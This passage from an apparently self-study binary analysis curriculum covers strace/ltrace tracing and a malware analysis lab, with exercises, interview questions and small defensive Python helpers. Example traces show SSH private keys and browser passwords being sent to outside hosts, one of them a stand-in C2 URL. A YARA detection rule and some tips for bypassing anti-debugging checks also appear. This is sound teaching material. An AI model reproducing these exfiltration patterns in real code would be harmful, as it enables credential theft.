    • How can you tell from syscall traces whether a program is leaking memory?

    Book References:

    • “Computer Systems: A Programmer’s Perspective” - Chapter 9: Virtual Memory
    • “The Linux Programming Interface” - Chapter 6: Processes (memory layout)
    • “Practical Binary Analysis” by Dennis Andriesse - Chapter 5.2: Loading and Dynamic Linking
  3. Library Calls vs. System Calls
    • Library calls (ltrace) are user-space wrappers around syscalls
    • One fread() might generate multiple read() syscalls due to buffering
    • Understanding the libc abstraction layer

    Guiding Questions:

    • Why does printf("hello") not immediately call write() syscall?
    • How does libc’s buffering affect what you see in strace vs. ltrace?
    • When would you use ltrace instead of strace (and vice versa)?

    Book References:

    • “The Linux Programming Interface” - Chapter 13: File I/O Buffering
    • “Computer Systems: A Programmer’s Perspective” - Chapter 10: System-Level I/O
  4. File Descriptors and File Operations
    • Understanding fd numbers: 0=stdin, 1=stdout, 2=stderr, 3+=open files
    • How openat(), read(), write(), close() work together
    • Interpreting flags like O_RDONLY, O_WRONLY, O_CREAT

    Guiding Questions:

    • What does openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3 tell you?
    • How can you track which fd corresponds to which file in a long trace?
    • What’s suspicious about a program opening /dev/urandom or /etc/shadow?

    Book References:

    • “The Linux Programming Interface” - Chapter 4: File I/O: The Universal I/O Model
    • “The Linux Programming Interface” - Chapter 18: Directories and Links
  5. Process Lifecycle (fork/exec/wait)
    • How processes create children with fork(), replace themselves with execve()
    • Following child processes with strace -f
    • Understanding return values: fork() returns twice (parent gets child PID, child gets 0)

    Guiding Questions:

    • Why does fork() return different values in parent and child?
    • What happens to file descriptors when a process calls execve()?
    • How would you trace a shell script that spawns multiple child processes?

    Book References:

    • “The Linux Programming Interface” - Chapter 24: Process Creation
    • “The Linux Programming Interface” - Chapter 27: Program Execution
    • “Computer Systems: A Programmer’s Perspective” - Chapter 8.4: Process Control
  6. Network Socket API
    • Understanding socket(), connect(), bind(), listen(), accept(), send(), recv()
    • Reading sockaddr structures to extract IP addresses and ports
    • Identifying client vs. server behavior from syscall patterns

    Guiding Questions:

    • What syscall sequence indicates a program is acting as a server?
    • How do you extract the destination IP and port from a connect() call?
    • What’s the difference between AF_INET (IPv4) and AF_INET6 (IPv6)?

    Book References:

    • “The Linux Programming Interface” - Chapter 56-61: Sockets and Network Programming
    • “Computer Systems: A Programmer’s Perspective” - Chapter 11: Network Programming
  7. Signal Handling
    • How programs respond to events (Ctrl+C sends SIGINT, segfault triggers SIGSEGV)
    • Seeing rt_sigaction() and rt_sigprocmask() in traces
    • Understanding signal delivery and handler installation

    Guiding Questions:

    • What does it mean when a program installs a handler for SIGSEGV?
    • Why might malware install signal handlers to detect debugging?
    • How can you tell if a program is ignoring SIGTERM?

    Book References:

    • “The Linux Programming Interface” - Chapter 20-22: Signals
    • “Computer Systems: A Programmer’s Perspective” - Chapter 8.5: Signals
  8. Dynamic Linking and Shared Libraries
    • How programs load .so files at runtime
    • Understanding LD_PRELOAD and library injection
    • Seeing dlopen(), dlsym() for runtime loading

    Guiding Questions:

    • What’s happening when you see multiple openat() calls to .so files?
    • How could an attacker use LD_PRELOAD maliciously?
    • Why do some programs use dlopen() instead of linking at compile time?

    Book References:

    • “Computer Systems: A Programmer’s Perspective” - Chapter 7: Linking
    • “Practical Binary Analysis” - Chapter 5: Loading and Dynamic Linking
    • “The Linux Programming Interface” - Chapter 41-42: Shared Libraries
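A quick self-experiment tying several of these concepts together (fd numbering, raw syscall wrappers vs. buffered I/O): run this script under `strace python3 script.py` and match the syscalls to the lines below.

```python
import os
import tempfile

# fd numbering in practice: 0/1/2 are stdin/stdout/stderr, so the first
# file a fresh process opens usually lands on fd 3 -- which is why strace
# traces are full of "... = 3". os.open/os.write are thin wrappers over
# the openat()/write() syscalls, unlike buffered open()/print().
tmpdir = tempfile.mkdtemp()
path = os.path.join(tmpdir, "demo.txt")

fd = os.open(path, os.O_WRONLY | os.O_CREAT, 0o600)  # one openat() syscall
os.write(fd, b"hello")                               # one write() syscall
os.close(fd)                                         # one close() syscall

size = os.path.getsize(path)
os.remove(path)
os.rmdir(tmpdir)
print(fd, size)  # fd is typically 3 in a fresh process; size is 5
```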

Questions to Guide Your Design

  1. How can you automatically filter out “boring” syscalls (like mmap() for library loading) to focus on interesting behavior?
    • Consider writing a Python script that parses strace output and highlights file/network operations
    • What heuristics distinguish initialization syscalls from runtime behavior?
  2. How would you detect anti-debugging or anti-tracing techniques in a program?
    • Programs can check if they’re being traced using ptrace(PTRACE_TRACEME)
    • What syscall patterns indicate a program is checking for analysis tools?
  3. How can you reconstruct a program’s command-line parsing logic from ltrace output alone?
    • Watch for strcmp(), strncmp(), getopt() calls
    • Can you build a decision tree of program behavior based on arguments?
  4. What’s the difference between tracing a statically-linked binary vs. a dynamically-linked binary?
    • Static binaries make syscalls directly; dynamic binaries go through libc
    • How does this affect what you see in strace vs. ltrace?
  5. How would you trace a multi-threaded program with strace?
    • Use strace -f to follow threads created by clone()
    • How do you distinguish thread creation from process creation in the output?
  6. Can you identify a program’s cryptographic operations from syscall traces?
    • Look for reads from /dev/urandom (entropy source)
    • Large writes to network sockets might indicate encrypted communication
  7. How would you use strace to diagnose why a program is slow or hanging?
    • Look for blocking syscalls: read() on network sockets, wait() on child processes
    • Use strace -T to show time spent in each syscall
  8. How can you determine if a binary is packed or obfuscated by examining its syscalls?
    • Self-modifying code might use mprotect() to change memory permissions
    • Packed binaries often unpack themselves in memory before executing

Thinking Exercise

Exercise 1: Manual Syscall Trace Analysis

Before running any tools, examine this strace output from an unknown binary:

execve("./mystery", ["./mystery"], 0x7ffc...) = 0
openat(AT_FDCWD, "/home/user/.ssh/id_rsa", O_RDONLY) = 3
read(3, "-----BEGIN RSA PRIVATE KEY-----\n"..., 4096) = 1679
close(3) = 0
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(443),
        sin_addr=inet_addr("203.0.113.45")}, 16) = 0
write(3, "-----BEGIN RSA PRIVATE KEY-----\n"..., 1679) = 1679
close(3) = 0
unlink("/home/user/.ssh/id_rsa") = 0

Questions to answer:

  1. What is this program doing? (Be specific about each step)
  2. What type of malware behavior does this exhibit?
  3. What Indicators of Compromise (IOCs) can you extract?
  4. How would you write a YARA rule to detect similar behavior?
  5. What syscall would you set a breakpoint on if debugging this?

Exercise 2: ltrace Password Extraction

Given this ltrace output from a crackme:

__libc_start_main(...)
puts("Enter password: ")
fgets("my_guess\n", 100, 0x7f...)
strlen("my_guess\n") = 9
strcmp("my_guess", "sup3r_s3cr3t") = -1
puts("Wrong password!")

Tasks:

  1. Extract the correct password (even though we guessed wrong)
  2. Explain why ltrace is more useful than strace for this crackme
  3. What would strace show instead? (Describe the syscalls)
  4. How could the developer prevent this ltrace attack?

Exercise 3: Network Protocol Reconstruction

Analyze this strace excerpt and reconstruct the network protocol:

socket(AF_INET, SOCK_STREAM, 0) = 3
connect(3, {sin_addr=inet_addr("10.0.0.5"), sin_port=htons(9999)}, 16) = 0
write(3, "HELLO\n", 6) = 6
read(3, "OK\n", 4096) = 3
write(3, "GET /data\n", 10) = 10
read(3, "DATA:12345\n", 4096) = 11
write(3, "BYE\n", 4) = 4
close(3) = 0

Questions:

  1. Is this a text-based or binary protocol?
  2. What’s the message flow? (Draw a sequence diagram)
  3. How would you fuzz this protocol?
  4. What’s missing from this trace that would help with analysis?

The Interview Questions They’ll Ask

  1. “You’re analyzing a suspicious binary. It produces no output, but you suspect it’s exfiltrating data. How would you use strace to confirm this?”
    • Expected Answer: Use strace -e network to trace network syscalls. Look for socket(), connect(), send(), or write() to network fds. Check destination IPs. Use strace -s 1000 to see full data buffers. Alternatively, combine with Wireshark for full packet capture.
  2. “Explain the difference between strace and ltrace. When would you use each?”
    • Expected Answer: strace traces system calls (kernel boundary), ltrace traces library calls (user-space functions). Use strace for file/network I/O, process management. Use ltrace for string operations (strcmp), crypto functions (MD5), library-level logic. Sometimes you need both: strace shows what happens, ltrace shows how the program logic works.
  3. “A program is reading from /dev/urandom. What does this tell you, and what should you investigate next?”
    • Expected Answer: It’s generating random numbers, likely for cryptography or nonce generation. Check how much entropy it reads. Look for subsequent crypto operations (OpenSSL functions in ltrace, or network writes that might be encrypted data). Could be legitimate (TLS) or malicious (ransomware generating encryption keys).
  4. “How does strace work under the hood? What syscall does strace itself use?”
    • Expected Answer: strace uses ptrace() syscall to attach to a process and intercept its syscalls. When the traced process makes a syscall, the kernel stops it and notifies strace. This is the same mechanism debuggers use. This is why anti-debugging malware often checks for ptrace() or looks for parent processes named “strace”.
  5. “You see hundreds of mmap() and mprotect() calls in a trace. What might this indicate?”
    • Expected Answer: Could be normal (loading shared libraries, allocating memory). Or could indicate packing/obfuscation—malware unpacking itself, self-modifying code, or JIT compilation. Check if mprotect() is changing memory to executable (PROT_EXEC). Packed malware often mmap()s space, writes unpacked code, then mprotect()s it to RWX.
  6. “How would you trace a program that uses fork() to create multiple child processes?”
    • Expected Answer: Use strace -f (follow forks). Output can be confusing with interleaved processes. Use -ff -o trace.log to write each process to a separate file (trace.log.PID). Then analyze each child’s behavior independently. Watch for clone() (threads) vs. fork() (processes).
  7. “A program calls unlink() on its own executable. What’s likely happening?”
    • Expected Answer: It’s deleting itself, common in malware to hide tracks. On Linux, an open file can be deleted—it stays on disk until the last fd is closed. The program continues running from memory. This is an anti-forensics technique. You’d need to dump the process memory to recover the binary.
  8. “You trace a crackme and see strcmp("my_input", "secretpass") = -1. Is this always the password?”
    • Expected Answer: Usually yes, but not always! Some crackmes use tricks: comparing hashes instead of plaintext, doing multiple checks (must pass all), or using timing attacks. Also, smart crackmes might use memcmp() (binary compare) instead of strcmp() to avoid ltrace. Or they might implement custom comparison in assembly to avoid library calls entirely.
  9. “How can a program detect that it’s being traced by strace, and how would you bypass this detection?”
    • Expected Answer: Programs can call ptrace(PTRACE_TRACEME) which fails if already traced (strace uses ptrace). They can check /proc/self/status for “TracerPid”. They can use timing attacks (strace is slow). Bypasses: Use kernel modules that hook syscalls without ptrace. Use emulation (QEMU user-mode). Patch the binary to remove checks. Use LD_PRELOAD to fake ptrace return values.
  10. “You need to analyze a binary but it’s statically linked. How does this affect your strace/ltrace strategy?”
    • Expected Answer: ltrace is useless—no library calls to intercept. strace still works (syscalls are unavoidable). You’ll see raw syscalls instead of nice library wrappers. For string operations, you’ll need to disassemble or use dynamic instrumentation (Frida, DynamoRIO) to hook internal functions.

Books That Will Help

Topic Book Chapter/Section Why It Matters
System Call Fundamentals “The Linux Programming Interface” by Michael Kerrisk Ch. 3: System Programming Concepts Complete reference for every syscall you’ll see in traces
System Call Mechanics “Computer Systems: A Programmer’s Perspective” by Bryant & O’Hallaron Ch. 8.1: Exceptions; Ch. 8.4: Process Control Understand how syscalls transition from user to kernel mode
File I/O Operations “The Linux Programming Interface” by Michael Kerrisk Ch. 4-5: File I/O Decode all file-related syscalls (open, read, write, ioctl)
Process Management “The Linux Programming Interface” by Michael Kerrisk Ch. 24-27: Process Creation, Monitoring, Execution Understand fork(), exec(), wait() patterns in traces
Network Programming “The Linux Programming Interface” by Michael Kerrisk Ch. 56-61: Sockets Interpret socket(), connect(), bind(), listen(), accept()
Network Internals “Computer Systems: A Programmer’s Perspective” Ch. 11: Network Programming Client-server architecture, protocol design
Signals “The Linux Programming Interface” by Michael Kerrisk Ch. 20-22: Signals Understand signal handlers in malware
Dynamic Linking “Computer Systems: A Programmer’s Perspective” Ch. 7: Linking Why you see library loads in strace
Binary Loading “Practical Binary Analysis” by Dennis Andriesse Ch. 5: Loading and Dynamic Linking How programs load and what syscalls this generates
Low-Level System Calls “Low-Level Programming” by Igor Zhirkov Ch. 2: Assembly Language Direct syscall invocation via syscall instruction
Ptrace Internals ptrace(2) man page (Linux man-pages) How strace itself works
Anti-Debugging Techniques “Practical Malware Analysis” by Sikorski & Honig Ch. 15: Anti-Disassembly and Anti-Debugging Detect and bypass tracing countermeasures
Behavioral Analysis Methodology “Practical Malware Analysis” by Sikorski & Honig Ch. 3: Basic Dynamic Analysis Professional workflow for using dynamic analysis tools
Assembly & Syscalls “Hacking: The Art of Exploitation” by Jon Erickson Ch. 0x200: Programming (syscalls section) Raw syscall invocation in assembly

Project 10: Malware Analysis Lab

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python
  • Alternative Programming Languages: PowerShell (Windows malware)
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Malware Analysis / Threat Intelligence
  • Software or Tool: REMnux, FLARE-VM, Ghidra, x64dbg
  • Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A complete malware analysis workflow, from safe environment setup to behavioral analysis, static analysis, and report writing.

Why it teaches binary analysis: Malware analysis is one of the most practical applications of binary analysis. It combines all skills: file formats, assembly, debugging, and behavioral analysis.

Core challenges you’ll face:

  • Safe environment → maps to VMs, network isolation
  • Behavioral analysis → maps to what does it do when run?
  • Static analysis → maps to understanding without running
  • Anti-analysis bypass → maps to detecting/evading protections

Resources for key challenges:

Key Concepts:

  • Safe Environment Setup: “Practical Malware Analysis” Ch. 2
  • Behavioral Analysis: “Practical Malware Analysis” Ch. 3
  • Anti-Debugging Techniques: OpenRCE Database

Difficulty: Advanced. Time estimate: 4-6 weeks. Prerequisites: Projects 1-9, strong Windows/Linux knowledge.

Real world outcome:

Deliverables:

  • Analysis output or tooling scripts
  • Report with control/data flow notes

Validation checklist:

  • Parses sample binaries correctly
  • Findings are reproducible in debugger
  • No unsafe execution outside lab

```markdown
# Malware Analysis Report: suspicious.exe

## Executive Summary

The sample is a credential stealer that exfiltrates browser passwords to a C2 server at 192.168.1.100:443.

## Static Analysis

- File Type: PE32+ executable (x64)
- Compiler: MSVC 2019
- Imports: WinInet (HTTP), Crypt32 (decryption), Advapi32 (registry)
- Packed: UPX 3.96 (unpacked for analysis)
- Strings:
  - "Chrome\User Data\Default\Login Data"
  - "Mozilla\Firefox\Profiles"
  - "https://c2.evil.com/upload"

## Behavioral Analysis

1. Creates mutex "Global\{GUID}" (prevents multiple instances)
2. Achieves persistence via Run key
3. Reads browser credential databases
4. Encrypts data with XOR key 0x37
5. Exfiltrates via HTTPS POST

## IOCs

- Mutex: Global\{12345678-1234-…}
- C2: 192.168.1.100:443
- User-Agent: "Mozilla/5.0 Custom"
- File: %APPDATA%\svchost.exe

## YARA Rule

rule credential_stealer {
    strings:
        $s1 = "Login Data" ascii
        $s2 = "cookies.sqlite" ascii
        $c2 = "192.168.1.100" ascii
    condition:
        2 of them
}
```

**Implementation Hints**:

Analysis workflow:
1. **Triage**: File type, hashes, VirusTotal check
2. **Environment Setup**: Isolated VM with snapshots
3. **Behavioral Analysis**:
   - Process Monitor (Windows) / strace (Linux)
   - Network capture (Wireshark, fakenet-ng)
   - Registry changes, file system changes
4. **Static Analysis**:
   - Strings, imports, exports
   - Unpack if packed
   - Disassemble/decompile key functions
5. **Dynamic Analysis**:
   - Debug with x64dbg/GDB
   - Set breakpoints on interesting APIs
   - Dump decrypted data
6. **Report Writing**: Document findings with IOCs
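Steps 1 and 4 of the workflow above are easy to start automating. A minimal triage sketch in Python — the magic-byte checks and the 4-character minimum for strings are illustrative choices, not a complete file-type database:

```python
import hashlib
import string

def triage(path):
    """Compute hashes, guess file type from magic bytes, extract ASCII strings."""
    data = open(path, "rb").read()
    report = {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }
    # Magic-byte checks for the two formats this guide focuses on
    if data[:2] == b"MZ":
        report["type"] = "PE (Windows executable)"
    elif data[:4] == b"\x7fELF":
        report["type"] = "ELF (Linux executable)"
    else:
        report["type"] = "unknown"
    # Naive `strings`: printable runs of 4+ bytes
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    runs, current = [], bytearray()
    for b in data:
        if b in printable:
            current.append(b)
        else:
            if len(current) >= 4:
                runs.append(current.decode())
            current = bytearray()
    if len(current) >= 4:
        runs.append(current.decode())
    report["strings"] = runs
    return report
```

Feed the hashes to VirusTotal and eyeball the strings for URLs, registry paths, and browser database names before moving to the VM.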

Anti-analysis techniques to watch for:
- IsDebuggerPresent() checks
- Timing checks (RDTSC)
- VM detection (CPUID, registry checks)
- Anti-disassembly tricks

**Learning milestones**:
1. **Set up safe lab** → Isolated analysis environment
2. **Behavioral analysis** → Understand without disassembly
3. **Static analysis** → Reverse engineer core functionality
4. **Write reports** → Document findings professionally

### The Core Question You're Answering

**"How do we safely dissect malicious software to understand its behavior, identify its capabilities, and develop countermeasures—all without becoming infected ourselves?"**

This project tackles the complete malware analysis workflow from containment to comprehension. You'll learn to think like both an attacker (to understand intent) and a defender (to build protections), mastering the delicate balance between running dangerous code and staying safe.

### Concepts You Must Understand First

1. **Virtualization and Sandboxing**
   - How virtual machines isolate malware from the host system
   - Understanding hypervisors (VirtualBox, VMware, KVM) and their security boundaries
   - Snapshotting and rollback to maintain clean analysis environments

   **Guiding Questions**:
   - What's the difference between a VM, a container, and a sandbox?
   - Can malware escape from a VM? What are VM escape vulnerabilities?
   - Why do you need network isolation in addition to VM isolation?

   **Book References**:
   - "Practical Malware Analysis" by Sikorski & Honig - Chapter 2: Malware Analysis in Virtual Machines
   - "Practical Binary Analysis" by Dennis Andriesse - Chapter 11: Dynamic Binary Instrumentation

2. **Portable Executable (PE) File Format**
   - Structure of Windows executables: DOS header, PE header, sections, imports, exports
   - Understanding Import Address Table (IAT) and how malware uses Windows APIs
   - Recognizing packed binaries by entropy analysis and section characteristics

   **Guiding Questions**:
   - What does it mean when a PE file has a high entropy `.text` section?
   - How do you identify if a binary is packed? (Hint: look at imports and section names)
   - What's the difference between static imports and dynamic loading with LoadLibrary/GetProcAddress?

   **Book References**:
   - "Practical Malware Analysis" - Chapter 1: Basic Static Techniques
   - "Practical Binary Analysis" - Chapter 2: The ELF File Format (similar concepts apply to PE)
   - "Windows Internals" by Russinovich & Solomon - Part 1, Chapter 3: System Mechanisms (PE format)
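
The entropy question above is worth making concrete. A small Shannon-entropy check — the 7.0 bits-per-byte threshold is a common rule of thumb for "probably packed/encrypted", not a hard boundary:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~0 for constant data, approaching 8.0 for packed/encrypted data."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_packed(section: bytes, threshold: float = 7.0) -> bool:
    # A high-entropy .text section is a classic packing indicator
    return shannon_entropy(section) > threshold
```

A section of all zeros scores 0.0; `os.urandom()` output scores close to 8.0; normal compiled code typically lands around 5-6.5.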

3. **Windows API and System Mechanisms**
   - Critical APIs malware uses: CreateProcess, WriteProcessMemory, SetWindowsHookEx
   - Registry manipulation for persistence (Run keys, services)
   - Process injection techniques (DLL injection, process hollowing, APC injection)

   **Guiding Questions**:
   - What API sequence indicates DLL injection into another process?
   - How does malware achieve persistence without being obvious?
   - What's the difference between CreateRemoteThread and QueueUserAPC for code injection?

   **Book References**:
   - "Practical Malware Analysis" - Chapter 12: Covert Malware Launching
   - "Windows Internals" - Part 1, Chapter 3: System Mechanisms
   - "The Art of Memory Forensics" by Ligh et al. - Chapter 11: Malware Detection
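
The API-sequence question above can be prototyped as subsequence matching over an API trace. A toy sketch — the trace format (a flat list of API names) is a simplification of what Process Monitor or an API-hooking framework actually produces:

```python
# Classic remote-thread injection sequence, in order (other calls may interleave)
INJECTION_SEQUENCE = [
    "OpenProcess",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "CreateRemoteThread",
]

def matches_injection(api_trace):
    """True if the trace contains the injection calls as an ordered subsequence."""
    it = iter(api_trace)
    return all(any(call == step for call in it) for step in INJECTION_SEQUENCE)
```

The order matters: the same four APIs in a different order (or in different processes) usually mean something benign, which is why behavioral detectors key on sequences rather than individual calls.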

4. **Anti-Analysis Techniques**
   - Anti-debugging: IsDebuggerPresent, CheckRemoteDebuggerPresent, timing checks (RDTSC)
   - Anti-VM: CPUID checks, registry keys (HKLM\HARDWARE\Description), driver detection
   - Packing and obfuscation: UPX, custom packers, polymorphic code

   **Guiding Questions**:
   - How can you defeat IsDebuggerPresent() checks?
   - What registry keys do VMs create that malware looks for?
   - What's the difference between packing (compression) and obfuscation (code transformation)?

   **Book References**:
   - "Practical Malware Analysis" - Chapter 15: Anti-Disassembly
   - "Practical Malware Analysis" - Chapter 16: Anti-Debugging
   - "Practical Malware Analysis" - Chapter 17: Anti-Virtual Machine Techniques; Chapter 18: Packers and Unpacking
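
The RDTSC/timing trick generalizes to any language: time a region of code and bail out if it ran "too slowly" (a human single-stepping in a debugger). A sketch with an injectable clock so the logic stays deterministic and testable:

```python
def timing_check(work, clock, threshold=1.0):
    """Run `work`; return True ('debugger suspected') if it took > threshold seconds."""
    start = clock()
    work()
    return clock() - start > threshold
```

Real malware uses RDTSC or GetTickCount as the clock; the bypass ideas are the same either way — hook the clock, or patch the comparison.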

5. **Network Protocols and C2 Communication**
   - HTTP/HTTPS C2 channels and beaconing patterns
   - DNS tunneling for data exfiltration
   - Understanding bot commands and malware control protocols

   **Guiding Questions**:
   - How do you identify C2 traffic in a network capture?
   - What makes DNS tunneling attractive for attackers?
   - How would you decode a base64-encoded HTTP POST that's exfiltrating data?

   **Book References**:
   - "Practical Malware Analysis" - Chapter 14: Malware-Focused Network Signatures
   - "Computer Systems: A Programmer's Perspective" - Chapter 11: Network Programming
   - "The Linux Programming Interface" - Chapter 59: Sockets: Internet Domains
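
Beaconing shows up in captures as suspiciously regular connection intervals. A sketch that flags low-jitter inter-arrival times — the 10% jitter threshold is illustrative, and real C2s often add deliberate jitter to evade exactly this check:

```python
from statistics import mean, pstdev

def looks_like_beacon(timestamps, max_jitter_ratio=0.1):
    """Flag if inter-arrival times between connections are nearly constant."""
    if len(timestamps) < 3:
        return False
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    avg = mean(gaps)
    return avg > 0 and pstdev(gaps) / avg < max_jitter_ratio
```

Feed it per-destination connection timestamps extracted from a pcap; a host phoning the same IP every 60 seconds on the dot is worth a closer look.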

6. **Behavioral Indicators of Compromise (IOCs)**
   - File-based IOCs: hashes (MD5, SHA256), file paths, mutex names
   - Network IOCs: IP addresses, domains, User-Agents, URL patterns
   - Registry IOCs: persistence keys, configuration storage

   **Guiding Questions**:
   - Why is SHA256 better than MD5 for malware identification?
   - What makes a good YARA rule vs. a brittle one?
   - How can attackers evade file-hash-based detection?

   **Book References**:
   - "Practical Malware Analysis" - Chapter 3: Basic Dynamic Analysis
   - "The Art of Memory Forensics" - Chapter 11: Malware Detection
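
The "good YARA rule vs. brittle one" question gets clearer if you model a rule condition directly. A sketch of YARA-style "N of them" matching in plain Python — this is only the matching idea, not the YARA engine:

```python
def rule_matches(data: bytes, strings: dict, minimum: int = 2) -> bool:
    """YARA-style 'N of them': fire if at least `minimum` patterns are present."""
    hits = [name for name, pattern in strings.items() if pattern in data]
    return len(hits) >= minimum

# Strings from the sample report's credential-stealer rule
CREDENTIAL_STEALER = {
    "$s1": b"Login Data",
    "$s2": b"cookies.sqlite",
    "$c2": b"192.168.1.100",
}
```

Requiring "2 of them" instead of all three is the robustness trade-off: one string can change between variants without breaking detection, while a single common string alone would match benign browsers too.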

7. **Disassembly and Decompilation**
   - Reading x86/x64 assembly: common patterns (function prologues, loops, conditionals)
   - Using Ghidra's decompiler to understand code logic
   - Identifying crypto operations, string obfuscation, and anti-analysis tricks in assembly

   **Guiding Questions**:
   - What assembly pattern indicates a string decryption routine?
   - How do you identify the "main" function in a stripped binary?
   - When is assembly analysis more reliable than decompiled code?

   **Book References**:
   - "Practical Malware Analysis" - Chapter 4: A Crash Course in x86 Disassembly
   - "Practical Binary Analysis" - Chapter 6: Disassembly and Binary Analysis Fundamentals
   - "Low-Level Programming" by Igor Zhirkov - Chapter 3-5: Assembly Programming

8. **Static vs. Dynamic Analysis Trade-offs**
   - When static analysis fails (heavy obfuscation, runtime code generation)
   - When dynamic analysis fails (time bombs, environment checks, anti-VM)
   - Hybrid approaches: concolic execution, taint analysis

   **Guiding Questions**:
   - If malware won't run in your VM, what static analysis can you do?
   - How do you analyze malware with a time-delayed payload?
   - What's the advantage of symbolic execution over pure dynamic analysis?

   **Book References**:
   - "Practical Malware Analysis" - Introduction: Basic Analysis vs. Advanced Analysis
   - "Practical Binary Analysis" - Chapter 11: Dynamic Binary Instrumentation

9. **Cryptography in Malware**
   - Identifying crypto operations: XOR loops, AES constants, hash functions
   - Understanding why malware encrypts strings and configuration
   - Extracting encryption keys from memory dumps

   **Guiding Questions**:
   - What assembly pattern indicates a simple XOR decryption loop?
   - How do you find AES constants (S-boxes, round constants) in a binary?
   - Why do ransomware authors sometimes make crypto mistakes that allow file recovery?

   **Book References**:
   - "Practical Malware Analysis" - Chapter 13: Data Encoding (includes crypto)
   - "Hacking: The Art of Exploitation" by Jon Erickson - Chapter 0x700: Cryptology
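
The XOR-loop question above is easy to experiment with. Single-byte XOR (like the 0x37 key in the sample report earlier) falls to a 256-key brute force with a known crib — a sketch:

```python
def xor_decrypt(data: bytes, key: int) -> bytes:
    """Single-byte XOR is its own inverse: encrypt and decrypt are the same."""
    return bytes(b ^ key for b in data)

def brute_force_xor(ciphertext: bytes, crib: bytes) -> list:
    """Try all 256 single-byte keys; return keys whose plaintext contains the crib."""
    return [k for k in range(256) if crib in xor_decrypt(ciphertext, k)]
```

Good cribs for malware configs: `b"http"`, `b".exe"`, `b"\x00\x00"` runs, or the PE magic `b"MZ"` for embedded payloads.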

10. **Memory Forensics**
    - Dumping process memory from running malware
    - Analyzing heaps for decrypted strings and configurations
    - Extracting injected code from remote processes

    **Guiding Questions**:
    - How do you dump a process's memory without killing it?
    - What tool helps you find injected DLLs in a process?
    - How can you extract the unpacked version of packed malware from memory?

    **Book References**:
    - "The Art of Memory Forensics" by Ligh et al. - Chapter 11: Malware Detection
    - "Practical Malware Analysis" - Chapter 9: OllyDbg (memory dumping)
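
On Linux, the "dump a process without killing it" question starts at /proc/<pid>/maps. A sketch that lists a process's executable regions (Linux-only; it reads its own maps, so it is safe to run anywhere in the lab):

```python
def executable_regions(pid="self"):
    """Parse /proc/<pid>/maps and return (start, end, path) for executable mappings."""
    regions = []
    with open(f"/proc/{pid}/maps") as f:
        for line in f:
            fields = line.split()
            addrs, perms = fields[0], fields[1]
            if "x" in perms:  # executable mapping: candidate for code dumping
                start, end = (int(a, 16) for a in addrs.split("-"))
                path = fields[5] if len(fields) > 5 else "[anonymous]"
                regions.append((start, end, path))
    return regions
```

Anonymous executable regions in a malware process are prime suspects for unpacked or injected code; pairing this with reads from /proc/<pid>/mem is the basic manual-dump workflow.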

### Questions to Guide Your Design

1. **How would you design a safe lab that prevents malware from detecting it's being analyzed?**
   - Consider anti-VM evasion: modify VM artifacts, use bare metal, change MAC addresses
   - Network design: INetSim for fake internet, isolated VLAN, no real network access
   - What makes an analysis environment "invisible" to malware?

2. **What's your workflow for triaging 100 malware samples to find the most interesting ones?**
   - Automate with YARA rules, static signatures, VirusTotal queries
   - Quick behavioral checks: does it crash immediately? Does it beacon to a C2?
   - How do you prioritize novel malware over known families?

3. **How would you bypass an anti-debugging check that uses RDTSC timing?**
   - Patch the check, hook RDTSC, use hardware breakpoints instead of software
   - Understand the trade-offs: patching changes the binary, hooking adds overhead

4. **How can you extract the configuration from a packed malware sample?**
   - Dynamic: let it unpack in memory, then dump
   - Static: find the unpacking stub, manually unpack, or use automated unpackers
   - What if the malware uses multi-stage unpacking?

5. **What's the difference between analyzing Windows malware vs. Linux malware?**
   - Tools differ: x64dbg/IDA vs. GDB/radare2
   - File formats: PE vs. ELF
   - APIs: Windows API vs. syscalls
   - But fundamental analysis principles remain the same

6. **How would you write a YARA rule that detects a malware family without generating false positives?**
   - Use unique strings, not common ones
   - Combine multiple weak indicators
   - Test against known benign software

7. **What indicators tell you if malware is polymorphic or metamorphic?**
   - Hash changes between samples of same family
   - Code structure changes (metamorphic) vs. just encryption key changes (polymorphic)
   - How does this affect detection?

8. **How do you analyze malware that requires internet connectivity to fully execute?**
   - Fake C2 server with INetSim or custom Python scripts
   - MITM proxy to intercept/modify traffic
   - What if the malware validates C2 certificates?

### Thinking Exercise

**Exercise 1: Behavioral Analysis from Process Monitor**

Examine this Process Monitor (procmon) output from an unknown executable:

```
CreateFile:  C:\Users\victim\AppData\Roaming\svchost.exe (SUCCESS)
WriteFile:   C:\Users\victim\AppData\Roaming\svchost.exe (SUCCESS, 45KB)
SetValueKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SecurityUpdate = "C:\Users\victim\AppData\Roaming\svchost.exe" (SUCCESS)
CreateFile:  C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Login Data (SUCCESS)
ReadFile:    Login Data (SUCCESS, 256KB)
Socket:      Connect to 203.0.113.50:443 (SUCCESS)
WriteFile:   Socket (SUCCESS, 256KB)
```


**Questions to answer**:
1. What persistence mechanism is being used?
2. What data is being exfiltrated?
3. What type of malware is this likely to be?
4. What IOCs can you extract?
5. What should you investigate next in static analysis?

**Exercise 2: Static Analysis - Identifying Packed Malware**

You run `strings` on `suspicious.exe` and get:

```
UPX0
UPX1
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
kernel32.dll
VirtualProtect
GetProcAddress
```


You check the PE sections:

```
Section Name: UPX0   (Virtual Size: 0x5000, Raw Size: 0)
Section Name: UPX1   (Virtual Size: 0x8000, Raw Size: 0x7800)
Section Name: .rsrc  (Virtual Size: 0x1000, Raw Size: 0x1000)
```


**Tasks**:
1. How do you know this binary is packed?
2. What tool would you use to unpack it?
3. If unpacking fails, how would you manually unpack it dynamically?
